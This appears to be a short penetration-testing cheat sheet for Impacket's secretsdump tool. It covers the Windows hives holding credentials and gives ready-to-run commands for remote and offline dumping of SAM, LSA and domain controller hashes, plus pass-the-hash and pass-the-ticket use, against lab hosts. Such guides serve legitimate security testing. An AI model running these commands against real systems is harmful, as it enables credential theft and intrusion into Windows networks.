Impacket SecretsDump is a powerful tool used in penetration testing and ethical hacking for extracting plaintext credentials and other sensitive information from Windows systems. Developed in Python, Impacket is an open-source collection of Python classes for working with network protocols. SecretsDump, a part of the Impacket suite, focuses specifically on extracting credentials and secrets from Windows machines.
| Hive | Details | Format or credential material |
|---|---|---|
| SAM | stores locally cached credentials (referred to as SAM secrets) | LM or NT hashes |
| SECURITY | stores domain cached credentials (referred to as LSA secrets) | Plaintext passwords
LM or NT hashes Kerberos keys (DES, AES) Domain Cached Credentials (DCC1 and DCC2) Security Questions (L$SQSA<SID>) |
| SYSTEM | contains enough info to decrypt SAM secrets and LSA secrets | N/A |
Capabilities:
- Credential Extraction
- Kerberos Ticket Extraction
- NTLM Hash Dumping
- Local and Remote Operations
- Pass-the-Ticket (PTT) Attack
How to use
1. Display the tool help
- impacket-secretsdump -h
2. Remote dumping of SAM & LSA secrets
- impacket-secretsdump lab.local/vry4n:IamAdmin123@192.168.0.101
3. dump the NTLM from DC, Active directory users
- impacket-secretsdump lab.local/vry4n:IamAdmin123@192.168.0.100 -just-dc-ntlm
4. Remote dumping of SAM & LSA secrets (pass-the-hash)
- secretsdump.py -hashes ‘LMhash:NThash’ ‘DOMAIN/USER@TARGET’
- impacket-secretsdump lab.local/administrator@192.168.0.100 -hashes aad3b435b51404eeaad3b435b51404ee:702262e2d64f9c0df2bec8ca45ff2985
5. Remote dumping of SAM & LSA secrets (pass-the-ticket)
- secretsdump.py -k ‘DOMAIN/USER@TARGET’
6. Offline dumping of LSA secrets from exported hives
- secretsdump.py -security ‘/path/to/security.save’ -system ‘/path/to/system.save’ LOCAL
7. Offline dumping of SAM secrets from exported hives
- secretsdump.py -sam ‘/path/to/sam.save’ -system ‘/path/to/system.save’ LOCAL
8. Offline dumping of SAM & LSA secrets from exported hives
- secretsdump.py -sam ‘/path/to/sam.save’ -security ‘/path/to/security.save’ -system ‘/path/to/system.save’ LOCAL